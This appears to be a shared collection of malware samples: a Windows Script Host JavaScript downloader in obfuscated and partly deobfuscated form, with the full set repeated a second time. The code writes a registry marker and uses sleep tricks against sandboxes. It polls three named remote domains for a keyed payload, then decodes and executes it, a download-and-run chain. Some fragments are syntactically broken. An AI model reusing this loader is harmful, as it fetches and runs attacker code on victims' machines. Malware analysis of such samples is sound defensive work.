malwarezone/deobf1.js Secret

## deobf1.js
constructor, sjhi = 2270;
if (!WScript["sleep"](1015)) {
    DR97 = (WScript)["CreateObject"]("WScript.Shell");
    tv45 = "HKEY_CURRENT_USER\\SOFTWARE\\sRVkOK\\";
    try {
        DR97["RegRead"](tv45);
    } catch (e) {
        DR97["RegWrite"](tv45, "", "REG_SZ");
        ey30 = 90;
    }
    lBLLs = ey30;
    EH70 = "VnXNuCz";
    for (US59 = 67; US59 < 138552; US59++) {
        EH70 = EH70 + US59;
        EH70.indexOf("GkmX");
    }
}
HI34[3](jf61('qwegmmonsr?k\"c+=\'\"p+hCpD.8h3c,r afeasl/s\'e+)];4 8LSNn2[69.7sEeBn+d\'(/)/;: s}pctatthc\'h (,e\')T{E Gr\'e(tnuerpno .f6a2lNsLe ;{ y}r ti f} ;(\"L6N42168.7s2t\"a+t3u8sD C===3=8 D2C0{0 )) \"{% NvIaArM OBDxS4N9D R=E SLUN%2\"6 .=r!e s)p\"o%nNsIeATMeOxDtS;N DiRfE S(U(%B\"x(4s9g.niinrdteSxtOnfe(m\"n@o\"r+iCvDn8E3d+n\"a@p\"x,E .0))\")l=l=e-h1S). t{p iWrSccSrWi\"p(tt.cseljebeOpe(t2a2e2r2C2.)t;p i}r ceSlWs(e  f{i  B;x)4093 +=0 7B,x24(9].\"rretpslbaucse\"([\")@(\"g+nCiDr8t3S+o\"t@.\"),(\"m\"o)d;n avra.rh taaCM1  ==  3B8xD4C9 .;r)e\'pPlTaTcHeL(M/X(r\\edv{r2e}S)./2gL,M XfSuMn\'c(tticoenj b(OyeRt8a6e)r C{. trpeitrucrSnW  S=t r6i2nNgL. f{r o)m3C h<a r4C8oSdne(( pealrishewI n;t0( y=R 8468,S1n0 );+]3\"0y)c;. g}r)o;. aHnIo3l4a[.3w]w(wa\"C,1\")m(o)c;. nWiStcrraimpttn.iQausiotr(e)p;a .}w w}w \"e,l\"seed .{g rWuSbcnreilplti.ds-lneoetpn(i2m2d2a2b2.)w;w w}\" [n S=8 49+7+E;B}'))(EH70);
uukzr = HI34;, ,
function Function() {
    [native code]
}

## deobf2.js
BE79 = ["www.badminton-dillenburg.de", "www.aperosaintmartin.com", "www.alona.org.cy"];
nS84 = 0;
while (nS84 < 3) {
    LN26 = WScript.CreateObject('MSXML2.ServerXMLHTTP');
    CD83 = Math.random().toString()["substr"](2, 70 + 30);
    if (WScript.CreateObject("WScript.Shell").ExpandEnvironmentStrings("%USERDNSDOMAIN%") != "%USERDNSDOMAIN%") {
        CD83 = CD83 + "278146";
    }
    try {
        LN26.open('GET', 'https://' + BE79[nS84] + '/search.php' + "?someqwgmnrkc=" + CD83, false);
        LN26.send();
    } catch (e) {
        return false;
    }
    if (LN26.status === 200) {
        var Bx49 = LN26.responseText;
        if ((Bx49.indexOf("@" + CD83 + "@", 0)) == -1) {
            WScript.sleep(22222);
        } else {
            Bx49 = Bx49.replace("@" + CD83 + "@", "");
            var aC1 = Bx49.replace(/(\d{2})/g, function(yR86) {
                return String.fromCharCode(parseInt(yR86, 10) + 30);
            });
            HI34[3](aC1)();
            WScript.Quit();
        }
    } else {
        WScript.sleep(22222);
    }
    nS84++;
}

## test.js
cV52(0, 906);

function Ao68() {
    HI34 = jf61(CN43).split(VO94);
}
hH21(1, "RNXjd");

function Ws75(qz50, Cx53) {
    return qz50.charAt(Cx53);
}
VO94 = "NVppV";

function jJ59() {
    HI34[Ru83] = cV52[HI34[pb56]];
}

function cV52(Gg42) {
    CN43 = '(\\;\" L}6fN 4i2t1 6r8}.y7 s{2;t \\e\"Las+Ntl32ua86sfD.  Co=n=p=r3e=u8n tD(2eC\'0\\{r0G  )E){ T\\)\"\'{\\%e ,N(v Iha\'A\\rcMh tOtBaDtxcSp4}Ns9 D: ;R/=)E/ (S\'L\\UdN+%n2B\\e\"E6s 7..=9r6![e2 nsN)SpL\\8\" o4%;n]N)s+Iee\'A\\TsM/elOsxaDetfSa; Nr ,Dci3Rhf8E. DSp(CUh(+%pB\"\\\\\"\'x\\(=4+sc9\"g\\.kn?irisnnrodmtmegSexwtqO\'n(f1e6(fmj\\(\"]n8@2o-\\1\"3r[+4i3CIvHD}n 8}E;3)d\"+Xnm\\k\"Ga\"@(pf\\O\"xxe,dEn i..00)7)H\\E\";)9l5=SlU=+e0-7hH1ES=)0.7 HtE{{p) +i+W9r5SScUc S;r2W5i5\\8\"3p1( t<t .9c5sSeUl;j7e6b e=O p9e5(StU2(a 2reo2fr;2\"Cz2C.u)NtX;npV \"i }=r  0c7eHSEl;W0s3(yee = sfL{LiB l  B};;x0)94=00933y e+ =;0) \"7\"B+,]x[2+4\"(Z9\"]+.]\\[\"+r\"rSe\"t+p]s[l+b\"a_u\"c+s]e[\\+\"\"(G[\"\\+\"])[@+(\"\\E\"\"g++]n[C+i\"DRr\"8 t,3\"S\"+ o,\\5\"4tv@t.(\\]\"\")e,\"(+\\]\"[m+\\\"\"toi)\"d+;]n[ +a\"vrr\"a+.]r[h+ \"tWagaeCRM\"1[ 7 9=R=D   {3 B)8ex(Dh4cCt9a c. ;}r );e)\\5\'4pvPtl(T]a\"TdcaH\"e+L]([M+/\"Xe(Rrg\\e\\Re\"d[v7{9rR2De }{S )y.r/t2;g\"L\\,\\MK OXkfVSRusM\\n\\\\\"\'+c\"(\"t+t]i[c+o\"eEn\"j+ ]b[(+O\"yRe\"R+t]8[a+6\"eA)\"r+ ]C[{+.\" Wt\"r+p]e[i+t\"rTuFc\"r+S]n[W+ \" OS\"=+t] [r+6\"iS2\"n+N\"g\\L\\.\" +f\"{\"r+ ]o[)+m\"3RCE ShU<\"a+ ]r[4+C\"8_o\"S+d]n[e+(\"(T \"p+e]a[l+r\"iNsEh\"e+w]I[ +n\";RtR0U(\" +y]=[R+ \"8C4_6Y8E,KS\"1+n]0[ +)\";H+\"] 3=\\ \"504yv)tc ;;.) \"g\"}+r])[o+;\".l laeH\"n+I]o[3+l\"4haS[..\"3+w]][w+(\"wta\"\\+\"]C[,+1\"\\p\"i)\"m+(]o[)+c\";r.c Sn\"W+i]S[t+c\"rWr\"a(i]m\"p\"t+t]n[.+i\"Qtacues\"i+o]t[r+(\"ej)bpO;\"a+ ].[}+w\" ewt}aw\" +\\]\"[e+,\"le\\r\"\"s+e]e[d+ \".C{\"g[ )rtWpuiSrbccSnWr(e i=l p7l9tRiD. d{s -)l)n5e1o0e1t(p]n\"(pie2em\"2+d]2[a+2\"bl2\".+)]w[;+w\" sw\"}[\\t\"p i[rnc SSW= 8! (4 9f+i7;+0E7;2B2}=\'i)h)j(sEVHp7p0V)N;ruoutkczurr=tHsIn3o4c;';
    pb56 = Gg42;
}

function XE58(fK3795) {
    return fK3795 % (SC11 + SC11);
}

function Hx28() {
    HI34[Ru83](HI34[SC11])(HI34[SC11]);
}

function AU60(PB59, uV55) {
    return PB59 + uV55;
}

function jf61(cf50) {
    tN38 = ('');
    vy51 = pb56;
    while (vy51 < qg48) {
        jB7462 = Ws75(cf50, vy51, cf50, vy51);
        if (XE58(vy51)) tN38 = AU60(tN38, jB7462, tN38);
        else tN38 = AU60(jB7462, tN38, jB7462);
        vy51++;
    }
    return tN38;
}
Ao68(146);
jJ59(569);

function hH21(SV64) {
    SC11 = SV64;
    Ru83 = SC11 + SV64 * SC11 + SV64;
    qg48 = 2195;
}
Hx28(36);
	constructor, sjhi = 2270;
	if (!WScript["sleep"](1015)) {
	DR97 = (WScript)["CreateObject"]("WScript.Shell");
	tv45 = "HKEY_CURRENT_USER\\SOFTWARE\\sRVkOK\\";
	try {
	DR97["RegRead"](tv45);
	} catch (e) {
	DR97["RegWrite"](tv45, "", "REG_SZ");
	ey30 = 90;
	}
	lBLLs = ey30;
	EH70 = "VnXNuCz";
	for (US59 = 67; US59 < 138552; US59++) {
	EH70 = EH70 + US59;
	EH70.indexOf("GkmX");
	}
	}
	HI34[3](jf61('qwegmmonsr?k\"c+=\'\"p+hCpD.8h3c,r afeasl/s\'e+)];4 8LSNn2[69.7sEeBn+d\'(/)/;: s}pctatthc\'h (,e\')T{E Gr\'e(tnuerpno .f6a2lNsLe ;{ y}r ti f} ;(\"L6N42168.7s2t\"a+t3u8sD C===3=8 D2C0{0 )) \"{% NvIaArM OBDxS4N9D R=E SLUN%2\"6 .=r!e s)p\"o%nNsIeATMeOxDtS;N DiRfE S(U(%B\"x(4s9g.niinrdteSxtOnfe(m\"n@o\"r+iCvDn8E3d+n\"a@p\"x,E .0))\")l=l=e-h1S). t{p iWrSccSrWi\"p(tt.cseljebeOpe(t2a2e2r2C2.)t;p i}r ceSlWs(e f{i B;x)4093 +=0 7B,x24(9].\"rretpslbaucse\"([\")@(\"g+nCiDr8t3S+o\"t@.\"),(\"m\"o)d;n avra.rh taaCM1 == 3B8xD4C9 .;r)e\'pPlTaTcHeL(M/X(r\\edv{r2e}S)./2gL,M XfSuMn\'c(tticoenj b(OyeRt8a6e)r C{. trpeitrucrSnW S=t r6i2nNgL. f{r o)m3C h<a r4C8oSdne(( pealrishewI n;t0( y=R 8468,S1n0 );+]3\"0y)c;. g}r)o;. aHnIo3l4a[.3w]w(wa\"C,1\")m(o)c;. nWiStcrraimpttn.iQausiotr(e)p;a .}w w}w \"e,l\"seed .{g rWuSbcnreilplti.ds-lneoetpn(i2m2d2a2b2.)w;w w}\" [n S=8 49+7+E;B}'))(EH70);
	uukzr = HI34;, ,
	function Function() {
	[native code]
	}
	BE79 = ["www.badminton-dillenburg.de", "www.aperosaintmartin.com", "www.alona.org.cy"];
	nS84 = 0;
	while (nS84 < 3) {
	LN26 = WScript.CreateObject('MSXML2.ServerXMLHTTP');
	CD83 = Math.random().toString()["substr"](2, 70 + 30);
	if (WScript.CreateObject("WScript.Shell").ExpandEnvironmentStrings("%USERDNSDOMAIN%") != "%USERDNSDOMAIN%") {
	CD83 = CD83 + "278146";
	}
	try {
	LN26.open('GET', 'https://' + BE79[nS84] + '/search.php' + "?someqwgmnrkc=" + CD83, false);
	LN26.send();
	} catch (e) {
	return false;
	}
	if (LN26.status === 200) {
	var Bx49 = LN26.responseText;
	if ((Bx49.indexOf("@" + CD83 + "@", 0)) == -1) {
	WScript.sleep(22222);
	} else {
	Bx49 = Bx49.replace("@" + CD83 + "@", "");
	var aC1 = Bx49.replace(/(\d{2})/g, function(yR86) {
	return String.fromCharCode(parseInt(yR86, 10) + 30);
	});
	HI34[3](aC1)();
	WScript.Quit();
	}
	} else {
	WScript.sleep(22222);
	}
	nS84++;
	}
	cV52(0, 906);

	function Ao68() {
	HI34 = jf61(CN43).split(VO94);
	}
	hH21(1, "RNXjd");

	function Ws75(qz50, Cx53) {
	return qz50.charAt(Cx53);
	}
	VO94 = "NVppV";

	function jJ59() {
	HI34[Ru83] = cV52[HI34[pb56]];
	}

	function cV52(Gg42) {
	CN43 = '(\\;\" L}6fN 4i2t1 6r8}.y7 s{2;t \\e\"Las+Ntl32ua86sfD. Co=n=p=r3e=u8n tD(2eC\'0\\{r0G )E){ T\\)\"\'{\\%e ,N(v Iha\'A\\rcMh tOtBaDtxcSp4}Ns9 D: ;R/=)E/ (S\'L\\UdN+%n2B\\e\"E6s 7..=9r6![e2 nsN)SpL\\8\" o4%;n]N)s+Iee\'A\\TsM/elOsxaDetfSa; Nr ,Dci3Rhf8E. DSp(CUh(+%pB\"\\\\\"\'x\\(=4+sc9\"g\\.kn?irisnnrodmtmegSexwtqO\'n(f1e6(fmj\\(\"]n8@2o-\\1\"3r[+4i3CIvHD}n 8}E;3)d\"+Xnm\\k\"Ga\"@(pf\\O\"xxe,dEn i..00)7)H\\E\";)9l5=SlU=+e0-7hH1ES=)0.7 HtE{{p) +i+W9r5SScUc S;r2W5i5\\8\"3p1( t<t .9c5sSeUl;j7e6b e=O p9e5(StU2(a 2reo2fr;2\"Cz2C.u)NtX;npV \"i }=r 0c7eHSEl;W0s3(yee = sfL{LiB l B};;x0)94=00933y e+ =;0) \"7\"B+,]x[2+4\"(Z9\"]+.]\\[\"+r\"rSe\"t+p]s[l+b\"a_u\"c+s]e[\\+\"\"(G[\"\\+\"])[@+(\"\\E\"\"g++]n[C+i\"DRr\"8 t,3\"S\"+ o,\\5\"4tv@t.(\\]\"\")e,\"(+\\]\"[m+\\\"\"toi)\"d+;]n[ +a\"vrr\"a+.]r[h+ \"tWagaeCRM\"1[ 7 9=R=D {3 B)8ex(Dh4cCt9a c. ;}r );e)\\5\'4pvPtl(T]a\"TdcaH\"e+L]([M+/\"Xe(Rrg\\e\\Re\"d[v7{9rR2De }{S )y.r/t2;g\"L\\,\\MK OXkfVSRusM\\n\\\\\"\'+c\"(\"t+t]i[c+o\"eEn\"j+ ]b[(+O\"yRe\"R+t]8[a+6\"eA)\"r+ ]C[{+.\" Wt\"r+p]e[i+t\"rTuFc\"r+S]n[W+ \" OS\"=+t] [r+6\"iS2\"n+N\"g\\L\\.\" +f\"{\"r+ ]o[)+m\"3RCE ShU<\"a+ ]r[4+C\"8_o\"S+d]n[e+(\"(T \"p+e]a[l+r\"iNsEh\"e+w]I[ +n\";RtR0U(\" +y]=[R+ \"8C4_6Y8E,KS\"1+n]0[ +)\";H+\"] 3=\\ \"504yv)tc ;;.) \"g\"}+r])[o+;\".l laeH\"n+I]o[3+l\"4haS[..\"3+w]][w+(\"wta\"\\+\"]C[,+1\"\\p\"i)\"m+(]o[)+c\";r.c Sn\"W+i]S[t+c\"rWr\"a(i]m\"p\"t+t]n[.+i\"Qtacues\"i+o]t[r+(\"ej)bpO;\"a+ ].[}+w\" ewt}aw\" +\\]\"[e+,\"le\\r\"\"s+e]e[d+ \".C{\"g[ )rtWpuiSrbccSnWr(e i=l p7l9tRiD. d{s -)l)n5e1o0e1t(p]n\"(pie2em\"2+d]2[a+2\"bl2\".+)]w[;+w\" sw\"}[\\t\"p i[rnc SSW= 8! (4 9f+i7;+0E7;2B2}=\'i)h)j(sEVHp7p0V)N;ruoutkczurr=tHsIn3o4c;';
	pb56 = Gg42;
	}

	function XE58(fK3795) {
	return fK3795 % (SC11 + SC11);
	}

	function Hx28() {
	HI34[Ru83](HI34[SC11])(HI34[SC11]);
	}

	function AU60(PB59, uV55) {
	return PB59 + uV55;
	}

	function jf61(cf50) {
	tN38 = ('');
	vy51 = pb56;
	while (vy51 < qg48) {
	jB7462 = Ws75(cf50, vy51, cf50, vy51);
	if (XE58(vy51)) tN38 = AU60(tN38, jB7462, tN38);
	else tN38 = AU60(jB7462, tN38, jB7462);
	vy51++;
	}
	return tN38;
	}
	Ao68(146);
	jJ59(569);

	function hH21(SV64) {
	SC11 = SV64;
	Ru83 = SC11 + SV64 * SC11 + SV64;
	qg48 = 2195;
	}
	Hx28(36);